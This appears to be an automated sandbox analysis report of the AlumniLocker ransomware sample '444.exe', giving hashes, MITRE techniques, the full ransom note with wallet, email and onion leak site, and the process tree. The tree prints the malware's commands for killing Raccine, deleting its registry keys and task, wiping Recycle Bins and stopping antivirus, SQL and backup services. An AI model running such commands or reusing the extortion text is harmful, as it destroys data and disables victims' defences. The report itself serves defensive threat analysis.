e97c6e05b1a3d287151638ffe86229597b188f9aa6d34db255f08dbc11dbfbd8

General

Target

444.exe
Size

2.2MB
MD5

eb154d544f8cb7aeac7700100bfe7c1a
SHA1

5bc2d79943de6b47768db926704e21e88cb95aa2
SHA256

e97c6e05b1a3d287151638ffe86229597b188f9aa6d34db255f08dbc11dbfbd8
SHA512

22964c627143afba28b6b4f05bb93867edabe9842090c85cbc193ef957e26a2cf60660e6f98fbeb8218f5876cfcdb382094c537539e7709014ddc9bef8a2d165

Score

10^/10

discovery evasion persistence ransomware themida trojan

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\HOW_TO_RECOVER_YOUR_FILES.txt

Ransom Note

Your files is safely locked and automatically backup on our servers to unlock your files and get your password send this exact amount in 48 hours: 10 BTC ATTENTION: You just have 48 hours at the end of this period if you not pay this fee all of your personal files and data will be published on our WALL OF SHAME as public on internet. YOU CAN CONTACT WITH US INSTANT OVER ON TELEGRAM: AlumniLocker Bitcoin address for payment: 35LikWJCjvfHWDZezZXswgqNeuT6gv36YM All your data will UNLOCK automatically after the payment if you have any problem or question feel free to contact with us after the payment. TELEGRAM: AlumniLocker E-MAIL: alumnilocker@protonmail.com WALL OF SHAME URL: http://alumnilou7kzo4vzdedsoe6wnxoggbzsxk7qgnmmlsrf4mzuqchwsjid.onion IMPORTANT NOTE: DO NOT CONTACT WITH US BEFORE THE PAYMENT! We not reply messages without payment proof if you want to get answer have to send your payment proof as a screenshot. WHERE YOU CAN GET BITCOIN? www.localbitcoins.com www.paxful.com www.binance.com www.coinbase.com Key Identifier: iXmNfDd/Sf/yVYhho1ZNHZgU0TFoIjhX7OPZ3tbuS8mWzGX397EtwErPgQsaPPswvEAntdz9OkEEnK6O4a93EFUNyj2w1ChzDWhtusnaHxcKBOkuzSEaVVPed6F4Etsu3GfE0ePXOD/CS0Kuc/iRYwBhwTxG14dk2o7td6CJ4R/jiszh9XMQXQSjYCcjPCzdwW1ZHEB++IooKiFCEHTYouQKdfew+X4junrAkWASqjjfS8s1sIG6B/2S9JXDrQLld1JKIxczv4vML9pX6IGED9fkh046vEyLjisltk7Yl4pqilOFtwWec6R1eUMIjHTct71WmZzHtnRePNa6bzuNJezo664k84ty5E2HfrLJNugJ8mTHniMxhYb2esLOgtWyMg/xTY+Lr7Kp4gX7igVtGOWMdoEAoUJlCSyu+vMWXQDkoUv2btrTmsd1rqbEipIEVo9WvtNUEL1F1T213JvRix4DLm/EnwlmkAYbFQX1nM7zQVAQAXTNS0dA+AFOdKXlxnpe7ryzTZqnzbvTctp7OQU7/eg6PwqcxNR4JD3IIh47op5CQeYcvLqUExLBG3UthP+8TrdWx6h01xsPIT4zOd+X7Fs7zmncuJqq1dl7Smbd4KvxcFQeEWlqxy9KGwkRnlUqXy5OXuCJsN2w6ichIJN/0Lajxu6PeoZkXr22kco=

Emails

alumnilocker@protonmail.com

Wallets

35LikWJCjvfHWDZezZXswgqNeuT6gv36YM

URLs

http://alumnilou7kzo4vzdedsoe6wnxoggbzsxk7qgnmmlsrf4mzuqchwsjid.onion

Extracted

Path

C:\Users\Admin\Desktop\HOW_TO_RECOVER_YOUR_FILES.txt

Ransom Note

Your files is safely locked and automatically backup on our servers to unlock your files and get your password send this exact amount in 48 hours: 10 BTC ATTENTION: You just have 48 hours at the end of this period if you not pay this fee all of your personal files and data will be published on our WALL OF SHAME as public on internet. YOU CAN CONTACT WITH US INSTANT OVER ON TELEGRAM: AlumniLocker Bitcoin address for payment: 35LikWJCjvfHWDZezZXswgqNeuT6gv36YM All your data will UNLOCK automatically after the payment if you have any problem or question feel free to contact with us after the payment. TELEGRAM: AlumniLocker E-MAIL: alumnilocker@protonmail.com WALL OF SHAME URL: http://alumnilou7kzo4vzdedsoe6wnxoggbzsxk7qgnmmlsrf4mzuqchwsjid.onion IMPORTANT NOTE: DO NOT CONTACT WITH US BEFORE THE PAYMENT! We not reply messages without payment proof if you want to get answer have to send your payment proof as a screenshot. WHERE YOU CAN GET BITCOIN? www.localbitcoins.com www.paxful.com www.binance.com www.coinbase.com Key Identifier: iXmNfDd/Sf/yVYhho1ZNHZgU0TFoIjhX7OPZ3tbuS8mWzGX397EtwErPgQsaPPswvEAntdz9OkEEnK6O4a93EFUNyj2w1ChzDWhtusnaHxcKBOkuzSEaVVPed6F4Etsu3GfE0ePXOD/CS0Kuc/iRYwBhwTxG14dk2o7td6CJ4R/jiszh9XMQXQSjYCcjPCzdwW1ZHEB++IooKiFCEHTYouQKdfew+X4junrAkWASqjjfS8s1sIG6B/2S9JXDrQLld1JKIxczv4vML9pX6IGED9fkh046vEyLjisltk7Yl4pqilOFtwWec6R1eUMIjHTct71WmZzHtnRePNa6bzuNJezo664k84ty5E2HfrLJNugJ8mTHniMxhYb2esLOgtWyMg/xTY+Lr7Kp4gX7igVtGOWMdoEAoUJlCSyu+vMWXQDkoUv2btrTmsd1rqbEipIEVo9WvtNUEL1F1T213JvRix4DLm/EnwlmkAYbFQX1nM7zQVAQAXTNS0dA+AFOdKXlxnpe7ryzTZqnzbvTctp7OQU7/eg6PwqcxNR4JD3IIh47op5CQeYcvLqUExLBG3UthP+8TrdWx6h01xsPIT4zOd+X7Fs7zmncuJqq1dl7Smbd4KvxcFQeEWlqxy9KGwkRnlUqXy5OXuCJsN2w6ichIJN/0Lajxu6PeoZkXr22kco= Number of files that were processed is: 1782

Emails

alumnilocker@protonmail.com

Wallets

35LikWJCjvfHWDZezZXswgqNeuT6gv36YM

URLs

http://alumnilou7kzo4vzdedsoe6wnxoggbzsxk7qgnmmlsrf4mzuqchwsjid.onion

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Modifies extensions of user files 2 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

444.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\GroupStart.tif => C:\Users\Admin\Pictures\GroupStart.tif.alumni	444.exe
File opened for modification	C:\Users\Admin\Pictures\GroupStart.tif.alumni	444.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

444.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	444.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	444.exe

Drops startup file 1 IoCs

Processes:

444.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk 444.exe
Modifies file permissions 1 TTPs 3 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exe

pid process

12636 icacls.exe
12628 icacls.exe
12620 icacls.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	444.exe

pid	process
12636	icacls.exe
12628	icacls.exe
12620	icacls.exe

themida 1 IoCs

Detects Themida, Advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/memory/896-5-0x0000000001240000-0x0000000001241000-memory.dmp	themida

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

444.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 444.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	444.exe

Drops desktop.ini file(s) 3 IoCs

Processes:

444.exe

description	ioc	process
File created	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini	444.exe
File created	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	444.exe
File created	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini	444.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

444.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "YOUR FILES IN SAFELY LOCKED AND YOUR PASSWORD WAS CHANGED by Alumni AFTER THE PAYMENT PLEASE CONTACT WITH US ASAP."	444.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your logon password was changed also your files is safely locked and automatically backup on our servers to unlock your files and get your password send this exact amount in 48 hours: \r\n10 BTC \r\n\r\nYOU CAN CONTACT WITH US INSTANT OVER ON TELEGRAM OUR TG ADDRESS: \r\nAlumniLocker\r\n\r\nATTENTION: You just have 48 hours at the end of this period if you not pay this fee all of your personal files and data will be published on our WALL OF SHAME as public on internet.\r\n\r\nBitcoin address for payment:\r\n35LikWJCjvfHWDZezZXswgqNeuT6gv36YM\r\n\r\nAll your data will UNLOCK automatically after the payment if you have any problem or question feel free to contact with us after the payment.\r\n\r\nYOU CAN CONTACT INSTANT WITH TELEGRAM\r\n\r\nTELEGRAM:\r\nAlumniLocker\r\n\r\nE-MAIL:\r\nalumnilocker@protonmail.com\r\n\r\nWALL OF SHAME URL:\r\nhttp://alumnilou7kzo4vzdedsoe6wnxoggbzsxk7qgnmmlsrf4mzuqchwsjid.onion\r\n\r\nIMPORTANT NOTE:\r\nDO NOT CONTACT WITH US BEFORE THE PAYMENT! We not reply messages without payment proof if you want to get answer have to send your payment proof as a screenshot.\r\n\r\nWHERE YOU CAN GET BITCOIN?\r\nwww.localbitcoins.com\r\nwww.paxful.com\r\nwww.binance.com\r\nwww.coinbase.com\r\n\r\nInformation: Your Windows LogOn Password has been changed..."	444.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

444.exe

pid process

896 444.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 48 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
11668	taskkill.exe
11620	taskkill.exe
11452	taskkill.exe
11436	taskkill.exe
11328	taskkill.exe
10664	taskkill.exe
12188	taskkill.exe
11388	taskkill.exe
11976	taskkill.exe
11560	taskkill.exe
11536	taskkill.exe
11484	taskkill.exe
11420	taskkill.exe
10732	taskkill.exe
11652	taskkill.exe
11576	taskkill.exe
11412	taskkill.exe
11372	taskkill.exe
11360	taskkill.exe
11964	taskkill.exe
11528	taskkill.exe
11512	taskkill.exe
11504	taskkill.exe
11492	taskkill.exe
11396	taskkill.exe
11344	taskkill.exe
11552	taskkill.exe
11644	taskkill.exe
11584	taskkill.exe
11476	taskkill.exe
11336	taskkill.exe
10704	taskkill.exe
11684	taskkill.exe
11660	taskkill.exe
11600	taskkill.exe
11404	taskkill.exe
11352	taskkill.exe
3128	taskkill.exe
11628	taskkill.exe
11612	taskkill.exe
11592	taskkill.exe
11544	taskkill.exe
11520	taskkill.exe
11468	taskkill.exe
11460	taskkill.exe
11636	taskkill.exe
10720	taskkill.exe
11380	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

212 reg.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

notepad.exe

pid process

8660 notepad.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

14376 PING.EXE

pid	process
212	reg.exe

pid	process
8660	notepad.exe

pid	process
14376	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

444.exe

pid	process
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe
896	444.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

Processes:

444.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	896	444.exe
Token: SeDebugPrivilege	3128	taskkill.exe
Token: SeDebugPrivilege	10664	taskkill.exe
Token: SeDebugPrivilege	11628	taskkill.exe
Token: SeDebugPrivilege	10732	taskkill.exe
Token: SeDebugPrivilege	10704	taskkill.exe
Token: SeDebugPrivilege	11620	taskkill.exe
Token: SeDebugPrivilege	11552	taskkill.exe
Token: SeDebugPrivilege	10720	taskkill.exe
Token: SeDebugPrivilege	11592	taskkill.exe
Token: SeDebugPrivilege	11584	taskkill.exe
Token: SeDebugPrivilege	11352	taskkill.exe
Token: SeDebugPrivilege	11560	taskkill.exe
Token: SeDebugPrivilege	11328	taskkill.exe
Token: SeDebugPrivilege	11576	taskkill.exe
Token: SeDebugPrivilege	11336	taskkill.exe
Token: SeDebugPrivilege	11372	taskkill.exe
Token: SeDebugPrivilege	11460	taskkill.exe
Token: SeDebugPrivilege	11420	taskkill.exe
Token: SeDebugPrivilege	11492	taskkill.exe
Token: SeDebugPrivilege	11404	taskkill.exe
Token: SeDebugPrivilege	11388	taskkill.exe
Token: SeDebugPrivilege	11544	taskkill.exe
Token: SeDebugPrivilege	11380	taskkill.exe
Token: SeDebugPrivilege	11412	taskkill.exe
Token: SeDebugPrivilege	11452	taskkill.exe
Token: SeDebugPrivilege	11396	taskkill.exe
Token: SeDebugPrivilege	11528	taskkill.exe
Token: SeDebugPrivilege	11684	taskkill.exe
Token: SeDebugPrivilege	11360	taskkill.exe
Token: SeDebugPrivilege	11476	taskkill.exe
Token: SeDebugPrivilege	11520	taskkill.exe
Token: SeDebugPrivilege	11976	taskkill.exe
Token: SeDebugPrivilege	11964	taskkill.exe
Token: SeDebugPrivilege	11536	taskkill.exe
Token: SeDebugPrivilege	12188	taskkill.exe
Token: SeDebugPrivilege	11436	taskkill.exe
Token: SeDebugPrivilege	11512	taskkill.exe
Token: SeDebugPrivilege	11660	taskkill.exe
Token: SeDebugPrivilege	11668	taskkill.exe
Token: SeDebugPrivilege	11484	taskkill.exe
Token: SeDebugPrivilege	11504	taskkill.exe
Token: SeDebugPrivilege	11644	taskkill.exe
Token: SeDebugPrivilege	11612	taskkill.exe
Token: SeDebugPrivilege	11600	taskkill.exe
Token: SeDebugPrivilege	11344	taskkill.exe
Token: SeDebugPrivilege	11652	taskkill.exe
Token: SeDebugPrivilege	11636	taskkill.exe
Token: SeDebugPrivilege	12596	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

444.exe

pid process

896 444.exe
896 444.exe
896 444.exe
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

444.exe

pid process

896 444.exe
896 444.exe
896 444.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

444.exe

description	pid	process	target process
PID 896 wrote to memory of 3128	896	444.exe	taskkill.exe
PID 896 wrote to memory of 3128	896	444.exe	taskkill.exe
PID 896 wrote to memory of 3128	896	444.exe	taskkill.exe
PID 896 wrote to memory of 504	896	444.exe	reg.exe
PID 896 wrote to memory of 504	896	444.exe	reg.exe
PID 896 wrote to memory of 504	896	444.exe	reg.exe
PID 896 wrote to memory of 212	896	444.exe	reg.exe
PID 896 wrote to memory of 212	896	444.exe	reg.exe
PID 896 wrote to memory of 212	896	444.exe	reg.exe
PID 896 wrote to memory of 2180	896	444.exe	schtasks.exe
PID 896 wrote to memory of 2180	896	444.exe	schtasks.exe
PID 896 wrote to memory of 2180	896	444.exe	schtasks.exe
PID 896 wrote to memory of 3512	896	444.exe	cmd.exe
PID 896 wrote to memory of 3512	896	444.exe	cmd.exe
PID 896 wrote to memory of 3512	896	444.exe	cmd.exe
PID 896 wrote to memory of 1344	896	444.exe	cmd.exe
PID 896 wrote to memory of 1344	896	444.exe	cmd.exe
PID 896 wrote to memory of 1344	896	444.exe	cmd.exe
PID 896 wrote to memory of 2132	896	444.exe	netsh.exe
PID 896 wrote to memory of 2132	896	444.exe	netsh.exe
PID 896 wrote to memory of 2132	896	444.exe	netsh.exe
PID 896 wrote to memory of 800	896	444.exe	sc.exe
PID 896 wrote to memory of 800	896	444.exe	sc.exe
PID 896 wrote to memory of 800	896	444.exe	sc.exe
PID 896 wrote to memory of 3824	896	444.exe	sc.exe
PID 896 wrote to memory of 3824	896	444.exe	sc.exe
PID 896 wrote to memory of 3824	896	444.exe	sc.exe
PID 896 wrote to memory of 3804	896	444.exe	sc.exe
PID 896 wrote to memory of 3804	896	444.exe	sc.exe
PID 896 wrote to memory of 3804	896	444.exe	sc.exe
PID 896 wrote to memory of 3912	896	444.exe	sc.exe
PID 896 wrote to memory of 3912	896	444.exe	sc.exe
PID 896 wrote to memory of 3912	896	444.exe	sc.exe
PID 896 wrote to memory of 748	896	444.exe	sc.exe
PID 896 wrote to memory of 748	896	444.exe	sc.exe
PID 896 wrote to memory of 748	896	444.exe	sc.exe
PID 896 wrote to memory of 3144	896	444.exe	sc.exe
PID 896 wrote to memory of 3144	896	444.exe	sc.exe
PID 896 wrote to memory of 3144	896	444.exe	sc.exe
PID 896 wrote to memory of 3880	896	444.exe	sc.exe
PID 896 wrote to memory of 3880	896	444.exe	sc.exe
PID 896 wrote to memory of 3880	896	444.exe	sc.exe
PID 896 wrote to memory of 188	896	444.exe	netsh.exe
PID 896 wrote to memory of 188	896	444.exe	netsh.exe
PID 896 wrote to memory of 188	896	444.exe	netsh.exe
PID 896 wrote to memory of 2092	896	444.exe	sc.exe
PID 896 wrote to memory of 2092	896	444.exe	sc.exe
PID 896 wrote to memory of 2092	896	444.exe	sc.exe
PID 896 wrote to memory of 3412	896	444.exe	net.exe
PID 896 wrote to memory of 3412	896	444.exe	net.exe
PID 896 wrote to memory of 3412	896	444.exe	net.exe
PID 896 wrote to memory of 4076	896	444.exe	net.exe
PID 896 wrote to memory of 4076	896	444.exe	net.exe
PID 896 wrote to memory of 4076	896	444.exe	net.exe
PID 896 wrote to memory of 1336	896	444.exe	net.exe
PID 896 wrote to memory of 1336	896	444.exe	net.exe
PID 896 wrote to memory of 1336	896	444.exe	net.exe
PID 896 wrote to memory of 4128	896	444.exe	net.exe
PID 896 wrote to memory of 4128	896	444.exe	net.exe
PID 896 wrote to memory of 4128	896	444.exe	net.exe
PID 896 wrote to memory of 4184	896	444.exe	net.exe
PID 896 wrote to memory of 4184	896	444.exe	net.exe
PID 896 wrote to memory of 4184	896	444.exe	net.exe
PID 896 wrote to memory of 4216	896	444.exe	net.exe

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

Processes:

444.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "Your logon password was changed also your files is safely locked and automatically backup on our servers to unlock your files and get your password send this exact amount in 48 hours: \r\n10 BTC \r\n\r\nYOU CAN CONTACT WITH US INSTANT OVER ON TELEGRAM OUR TG ADDRESS: \r\nAlumniLocker\r\n\r\nATTENTION: You just have 48 hours at the end of this period if you not pay this fee all of your personal files and data will be published on our WALL OF SHAME as public on internet.\r\n\r\nBitcoin address for payment:\r\n35LikWJCjvfHWDZezZXswgqNeuT6gv36YM\r\n\r\nAll your data will UNLOCK automatically after the payment if you have any problem or question feel free to contact with us after the payment.\r\n\r\nYOU CAN CONTACT INSTANT WITH TELEGRAM\r\n\r\nTELEGRAM:\r\nAlumniLocker\r\n\r\nE-MAIL:\r\nalumnilocker@protonmail.com\r\n\r\nWALL OF SHAME URL:\r\nhttp://alumnilou7kzo4vzdedsoe6wnxoggbzsxk7qgnmmlsrf4mzuqchwsjid.onion\r\n\r\nIMPORTANT NOTE:\r\nDO NOT CONTACT WITH US BEFORE THE PAYMENT! We not reply messages without payment proof if you want to get answer have to send your payment proof as a screenshot.\r\n\r\nWHERE YOU CAN GET BITCOIN?\r\nwww.localbitcoins.com\r\nwww.paxful.com\r\nwww.binance.com\r\nwww.coinbase.com\r\n\r\nInformation: Your Windows LogOn Password has been changed..."	444.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "YOUR FILES IN SAFELY LOCKED AND YOUR PASSWORD WAS CHANGED by Alumni AFTER THE PAYMENT PLEASE CONTACT WITH US ASAP."	444.exe

C:\Users\Admin\AppData\Local\Temp\444.exe
"C:\Users\Admin\AppData\Local\Temp\444.exe"
1⤵
- Modifies extensions of user files
- Checks BIOS information in registry
- Drops startup file
- Checks whether UAC is enabled
- Drops desktop.ini file(s)
- Modifies WinLogon
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:896

C:\Windows\SysWOW64\taskkill.exe
"taskkill" /F /IM RaccineSettings.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3128

C:\Windows\SysWOW64\reg.exe
"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
2⤵
PID:504

C:\Windows\SysWOW64\reg.exe
"reg" delete HKCU\Software\Raccine /F
2⤵
- Modifies registry key
PID:212

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /DELETE /TN "Raccine Rules Updater" /F
2⤵
PID:2180

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
2⤵
PID:3512

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c rd /s /q D:\\$Recycle.bin
2⤵
PID:1344

C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
2⤵
PID:2132

C:\Windows\SysWOW64\sc.exe
"sc.exe" config Dnscache start= auto
2⤵
PID:800

C:\Windows\SysWOW64\sc.exe
"sc.exe" config upnphost start= auto
2⤵
PID:3804

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
2⤵
PID:3912

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLWriter start= disabled
2⤵
PID:748

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SSDPSRV start= auto
2⤵
PID:3824

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
2⤵
PID:3880

C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
2⤵
PID:188

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SstpSvc start= disabled
2⤵
PID:2092

C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeDLPAgentService /y
2⤵
PID:4184

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
3⤵
PID:4600

C:\Windows\SysWOW64\net.exe
"net.exe" stop avpsus /y
2⤵
PID:4128

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop avpsus /y
3⤵
PID:4584

C:\Windows\SysWOW64\net.exe
"net.exe" start upnphost /y
2⤵
PID:1336

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start upnphost /y
3⤵
PID:4524

C:\Windows\SysWOW64\net.exe
"net.exe" start SSDPSRV /y
2⤵
PID:4076

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start SSDPSRV /y
3⤵
PID:4440

C:\Windows\SysWOW64\net.exe
"net.exe" start Dnscache /y
2⤵
PID:3412

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start Dnscache /y
3⤵
PID:4408

C:\Windows\SysWOW64\net.exe
"net.exe" stop mfewc /y
2⤵
PID:4216

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfewc /y
3⤵
PID:4760

C:\Windows\SysWOW64\net.exe
"net.exe" stop NetBackup BMR MTFTP Service /y
2⤵
PID:4300

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
3⤵
PID:4660

C:\Windows\SysWOW64\net.exe
"net.exe" start FDResPub /y
2⤵
PID:4380

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start FDResPub /y
3⤵
PID:4916

C:\Windows\SysWOW64\net.exe
"net.exe" stop bedbg /y
2⤵
PID:4328

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop bedbg /y
3⤵
PID:4820

C:\Windows\SysWOW64\net.exe
"net.exe" stop BMR Boot Service /y
2⤵
PID:4256

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
3⤵
PID:4696

C:\Windows\SysWOW64\sc.exe
"sc.exe" config FDResPub start= auto
2⤵
PID:3144

C:\Windows\SysWOW64\net.exe
"net.exe" stop Intuit.QuickBooks.FCS /y
2⤵
PID:4468

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
3⤵
PID:4960

C:\Windows\SysWOW64\net.exe
"net.exe" stop YooIT /y
2⤵
PID:4624

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop YooIT /y
3⤵
PID:648

C:\Windows\SysWOW64\net.exe
"net.exe" stop DefWatch /y
2⤵
PID:4688

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
3⤵
PID:4176

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SQL_2008 /y
2⤵
PID:4796

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
3⤵
PID:1152

C:\Windows\SysWOW64\net.exe
"net.exe" stop EhttpSrv /y
2⤵
PID:4848

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EhttpSrv /y
3⤵
PID:4360

C:\Windows\SysWOW64\net.exe
"net.exe" stop MMS /y
2⤵
PID:4908

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MMS /y
3⤵
PID:1824

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SQLEXPRESS /y
2⤵
PID:4992

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
3⤵
PID:4452

C:\Windows\SysWOW64\net.exe
"net.exe" stop ekrn /y
2⤵
PID:5032

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ekrn /y
3⤵
PID:4540

C:\Windows\SysWOW64\net.exe
"net.exe" stop mozyprobackup /y
2⤵
PID:5076

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mozyprobackup /y
3⤵
PID:5876

C:\Windows\SysWOW64\net.exe
"net.exe" stop zhudongfangyu /y
2⤵
PID:4100

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
3⤵
PID:7204

C:\Windows\SysWOW64\net.exe
"net.exe" stop ccSetMgr /y
2⤵
PID:4008

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ccSetMgr /y
3⤵
PID:9604

C:\Windows\SysWOW64\net.exe
"net.exe" stop RTVscan /y
2⤵
PID:736

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
3⤵
PID:10152

C:\Windows\SysWOW64\net.exe
"net.exe" stop SavRoam /y
2⤵
PID:3820

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
3⤵
PID:9740

C:\Windows\SysWOW64\net.exe
"net.exe" stop ccEvtMgr /y
2⤵
PID:2480

